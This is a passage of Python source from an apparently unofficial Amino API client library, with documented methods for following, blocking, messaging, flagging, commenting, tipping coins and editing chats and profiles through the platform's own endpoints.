- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/search/amino-id-and-link?q={aminoId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
response = json.loads(response.text)["resultList"]
if len(response) == 0: raise exceptions.CommunityNotFound(aminoId)
else: return objects.CommunityList([com["refObject"] for com in response]).CommunityList
def get_user_following(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that the User is Following.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/joined?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_followers(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that are Following the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/member?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_visitors(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that Visited the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Visitors List <amino.lib.util.objects.VisitorsList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/visitors?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.VisitorsList(json.loads(response.text)).VisitorsList
def get_blocked_users(self, start: int = 0, size: int = 25):
"""
List of Users that the User Blocked.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Users List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/block?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_blog_info(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None):
if blogId or quizId:
if quizId is not None: blogId = quizId
response = self.session.get(f"{self.api}/g/s/blog/{blogId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetBlogInfo(json.loads(response.text)).GetBlogInfo
elif wikiId:
response = self.session.get(f"{self.api}/g/s/item/{wikiId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetWikiInfo(json.loads(response.text)).GetWikiInfo
elif fileId:
response = self.session.get(f"{self.api}/g/s/shared-folder/files/{fileId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.SharedFolderFile(json.loads(response.text)["file"]).SharedFolderFile
else: raise exceptions.SpecifyType()
def get_blog_comments(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None, sorting: str = "newest", start: int = 0, size: int = 25):
if sorting == "newest": sorting = "newest"
elif sorting == "oldest": sorting = "oldest"
elif sorting == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
if blogId or quizId:
if quizId is not None: blogId = quizId
response = self.session.get(f"{self.api}/g/s/blog/{blogId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.get(f"{self.api}/g/s/item/{wikiId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif fileId: response = self.session.get(f"{self.api}/g/s/shared-folder/files/{fileId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def get_blocker_users(self, start: int = 0, size: int = 25):
"""
List of Users that are Blocking the User.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List of User IDs <None>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/block/full-list?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["blockerUidList"]
def get_wall_comments(self, userId: str, sorting: str, start: int = 0, size: int = 25):
"""
List of Wall Comments of an User.
**Parameters**
- **userId** : ID of the User.
- **sorting** : Order of the Comments.
- ``newest``, ``oldest``, ``top``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Comments List <amino.lib.util.objects.CommentList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if sorting.lower() == "newest": sorting = "newest"
elif sorting.lower() == "oldest": sorting = "oldest"
elif sorting.lower() == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/g-comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def flag(self, reason: str, flagType: int, userId: str = None, blogId: str = None, wikiId: str = None, asGuest: bool = False):
"""
Flag a User, Blog or Wiki.
**Parameters**
- **reason** : Reason of the Flag.
- **flagType** : Type of the Flag.
- **userId** : ID of the User.
- **blogId** : ID of the Blog.
- **wikiId** : ID of the Wiki.
- *asGuest* : Execute as a Guest.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded()
if flagType is None: raise exceptions.FlagTypeNeeded()
data = {
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["objectId"] = userId
data["objectType"] = 0
elif blogId:
data["objectId"] = blogId
data["objectType"] = 1
elif wikiId:
data["objectId"] = wikiId
data["objectType"] = 2
else: raise exceptions.SpecifyType
if asGuest: flg = "g-flag"
else: flg = "flag"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/{flg}", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def send_message(self, chatId: str, message: str = None, messageType: int = 0, file: BinaryIO = None, fileType: str = None, replyTo: str = None, mentionUserIds: list = None, stickerId: str = None, embedId: str = None, embedType: int = None, embedLink: str = None, embedTitle: str = None, embedContent: str = None, embedImage: BinaryIO = None):
"""
Send a Message to a Chat.
**Parameters**
- **message** : Message to be sent
- **chatId** : ID of the Chat.
- **file** : File to be sent.
- **fileType** : Type of the file.
- ``audio``, ``image``, ``gif``
- **messageType** : Type of the Message.
- **mentionUserIds** : List of User IDS to mention. '@' needed in the Message.
- **replyTo** : Message ID to reply to.
- **stickerId** : Sticker ID to be sent.
- **embedTitle** : Title of the Embed.
- **embedContent** : Content of the Embed.
- **embedLink** : Link of the Embed.
- **embedImage** : Image of the Embed.
- **embedId** : ID of the Embed.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is not None and file is None:
message = message.replace("<$", "").replace("$>", "")
mentions = []
if mentionUserIds:
for mention_uid in mentionUserIds:
mentions.append({"uid": mention_uid})
if embedImage:
embedImage = [[100, self.upload_media(embedImage, "image"), None]]
data = {
"type": messageType,
"content": message,
"clientRefId": int(timestamp() / 10 % 1000000000),
"attachedObject": {
"objectId": embedId,
"objectType": embedType,
"link": embedLink,
"title": embedTitle,
"content": embedContent,
"mediaList": embedImage
},
"extensions": {"mentionedArray": mentions},
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["replyMessageId"] = replyTo
if stickerId:
data["content"] = None
data["stickerId"] = stickerId
data["type"] = 3
if file:
data["content"] = None
if fileType == "audio":
data["type"] = 2
data["mediaType"] = 110
elif fileType == "image":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/jpg"
data["mediaUhqEnabled"] = True
elif fileType == "gif":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/gif"
data["mediaUhqEnabled"] = True
else: raise exceptions.SpecifyType
data["mediaUploadValue"] = base64.b64encode(file.read()).decode()
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def delete_message(self, chatId: str, messageId: str, asStaff: bool = False, reason: str = None):
"""
Delete a Message from a Chat.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
- **asStaff** : If execute as a Staff member (Leader or Curator).
- **reason** : Reason of the action to show on the Moderation History.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"adminOpName": 102,
"adminOpNote": {"content": reason},
"timestamp": int(timestamp() * 1000)
}
data = json.dumps(data)
if not asStaff: response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}/admin", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def mark_as_read(self, chatId: str, messageId: str):
"""
Mark a Message from a Chat as Read.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"messageId": messageId,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/mark-as-read", headers=self.parse_headers(), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def edit_chat(self, chatId: str, doNotDisturb: bool = None, pinChat: bool = None, title: str = None, icon: str = None, backgroundImage: str = None, content: str = None, announcement: str = None, coHosts: list = None, keywords: list = None, pinAnnouncement: bool = None, publishToGlobal: bool = None, canTip: bool = None, viewOnly: bool = None, canInvite: bool = None, fansOnly: bool = None):
"""
Send a Message to a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **title** : Title of the Chat.
- **content** : Content of the Chat.
- **icon** : Icon of the Chat.
- **backgroundImage** : Url of the Background Image of the Chat.
- **announcement** : Announcement of the Chat.
- **pinAnnouncement** : If the Chat Announcement should Pinned or not.
- **coHosts** : List of User IDS to be Co-Host.
- **keywords** : List of Keywords of the Chat.
- **viewOnly** : If the Chat should be on View Only or not.
- **canTip** : If the Chat should be Tippable or not.
- **canInvite** : If the Chat should be Invitable or not.
- **fansOnly** : If the Chat should be Fans Only or not.
- **publishToGlobal** : If the Chat should show on Public Chats or not.
- **doNotDisturb** : If the Chat should Do Not Disturb or not.
- **pinChat** : If the Chat should Pinned or not.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if title: data["title"] = title
if content: data["content"] = content
if icon: data["icon"] = icon
if keywords: data["keywords"] = keywords
if announcement: data["extensions"]["announcement"] = announcement
if pinAnnouncement: data["extensions"]["pinAnnouncement"] = pinAnnouncement
if fansOnly: data["extensions"] = {"fansOnly": fansOnly}
if publishToGlobal: data["publishToGlobal"] = 0
if not publishToGlobal: data["publishToGlobal"] = 1
res = []
if doNotDisturb is not None:
if doNotDisturb:
data = json.dumps({"alertOption": 2, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not doNotDisturb:
data = json.dumps({"alertOption": 1, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if pinChat is not None:
if pinChat:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/pin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not pinChat:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/unpin", data=data, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if backgroundImage is not None:
data = json.dumps({"media": [100, backgroundImage, None], "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/background", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if coHosts is not None:
data = json.dumps({"uidList": coHosts, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/co-host", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if viewOnly is not None:
#fixed by Minori#6457
if viewOnly:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/enable", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not viewOnly:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/disable", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canInvite is not None:
if canInvite:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canInvite:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canTip is not None:
if canTip:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/enable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canTip:
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/disable", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
return res
def visit(self, userId: str):
"""
Visit an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}?action=visit", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def send_coins(self, coins: int, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
url = None
if transactionId is None: transactionId = str(UUID(hexlify(urandom(16)).decode('ascii')))
data = {
"coins": coins,
"tippingContext": {"transactionId": transactionId},
"timestamp": int(timestamp() * 1000)
}
if blogId is not None: url = f"{self.api}/g/s/blog/{blogId}/tipping"
if chatId is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/tipping"
if objectId is not None:
data["objectId"] = objectId
data["objectType"] = 2
url = f"{self.api}/g/s/tipping"
if url is None: raise exceptions.SpecifyType()
data = json.dumps(data)
response = self.session.post(url, headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def follow(self, userId: Union[str, list]):
"""
Follow an User or Multiple Users.
**Parameters**
- **userId** : ID of the User or List of IDs of the Users.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str):
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/member", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif isinstance(userId, list):
data = json.dumps({"targetUidList": userId, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/joined", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unfollow(self, userId: str):
"""
Unfollow an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def block(self, userId: str):
"""
Block an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unblock(self, userId: str):
"""
Unblock an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def join_community(self, comId: str, invitationId: str = None):
"""
Join a Community.
**Parameters**
- **comId** : ID of the Community.
- **invitationId** : ID of the Invitation Code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if invitationId: data["invitationId"] = invitationId
data = json.dumps(data)
response = self.session.post(f"{self.api}/x{comId}/s/community/join", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def request_join_community(self, comId: str, message: str = None):
"""
Request to join a Community.
**Parameters**
- **comId** : ID of the Community.
- **message** : Message to be sent.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"message": message, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/x{comId}/s/community/membership-request", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def leave_community(self, comId: str):
"""
Leave a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/x{comId}/s/community/leave", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def flag_community(self, comId: str, reason: str, flagType: int, isGuest: bool = False):
"""
Flag a Community.
**Parameters**
- **comId** : ID of the Community.
- **reason** : Reason of the Flag.
- **flagType** : Type of Flag.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded
if flagType is None: raise exceptions.FlagTypeNeeded
data = json.dumps({
"objectId": comId,
"objectType": 16,
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
})
if isGuest: flg = "g-flag"
else: flg = "flag"
response = self.session.post(f"{self.api}/x{comId}/s/{flg}", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def edit_profile(self, nickname: str = None, content: str = None, icon: BinaryIO = None, backgroundColor: str = None, backgroundImage: str = None, defaultBubbleId: str = None):
"""
Edit account's Profile.
**Parameters**
- **nickname** : Nickname of the Profile.
- **content** : Biography of the Profile.
- **icon** : Icon of the Profile.
- **backgroundImage** : Url of the Background Picture of the Profile.
- **backgroundColor** : Hexadecimal Background Color of the Profile.
- **defaultBubbleId** : Chat bubble ID.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"address": None,
"latitude": 0,
"longitude": 0,
"mediaList": None,
"eventSource": "UserProfileView",
"timestamp": int(timestamp() * 1000)
}
if nickname: data["nickname"] = nickname
if icon: data["icon"] = self.upload_media(icon, "image")
if content: data["content"] = content
if backgroundColor: data["extensions"]["style"]["backgroundColor"] = backgroundColor
if backgroundImage: data["extensions"]["style"]["backgroundMediaList"] = [[100, backgroundImage, None, None, None]]
if defaultBubbleId: data["extensions"]["defaultBubbleId"] = defaultBubbleId
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def set_privacy_status(self, isAnonymous: bool = False, getNotifications: bool = False):
"""
Edit account's Privacy Status.
**Parameters**
- **isAnonymous** : If visibility should be Anonymous or not.
- **getNotifications** : If account should get new Visitors Notifications.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if not isAnonymous: data["privacyMode"] = 1
if isAnonymous: data["privacyMode"] = 2
if not getNotifications: data["notificationStatus"] = 2
if getNotifications: data["privacyMode"] = 1
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/account/visit-settings", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def set_amino_id(self, aminoId: str):
"""
Edit account's Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"aminoId": aminoId, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/account/change-amino-id", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_linked_communities(self, userId: str):
"""
Get a List of Linked Communities of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["linkedCommunityList"]).CommunityList
def get_unlinked_communities(self, userId: str):
"""
Get a List of Unlinked Communities of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["unlinkedCommunityList"]).CommunityList
def reorder_linked_communities(self, comIds: list):
"""
Reorder List of Linked Communities.
**Parameters**
- **comIds** : IDS of the Communities.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"ndcIds": comIds, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/reorder", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def add_linked_community(self, comId: str):
"""
Add a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def remove_linked_community(self, comId: str):
"""
Remove a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def comment(self, message: str, userId: str = None, blogId: str = None, wikiId: str = None, replyTo: str = None):
"""
Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **message** : Message to be sent.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
- **replyTo** : ID of the Comment to Reply to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is None: raise exceptions.MessageNeeded
data = {
"content": message,
"stickerId": None,
"type": 0,
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["respondTo"] = replyTo
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def delete_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Delete a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def like_blog(self, blogId: Union[str, list] = None, wikiId: str = None):
"""
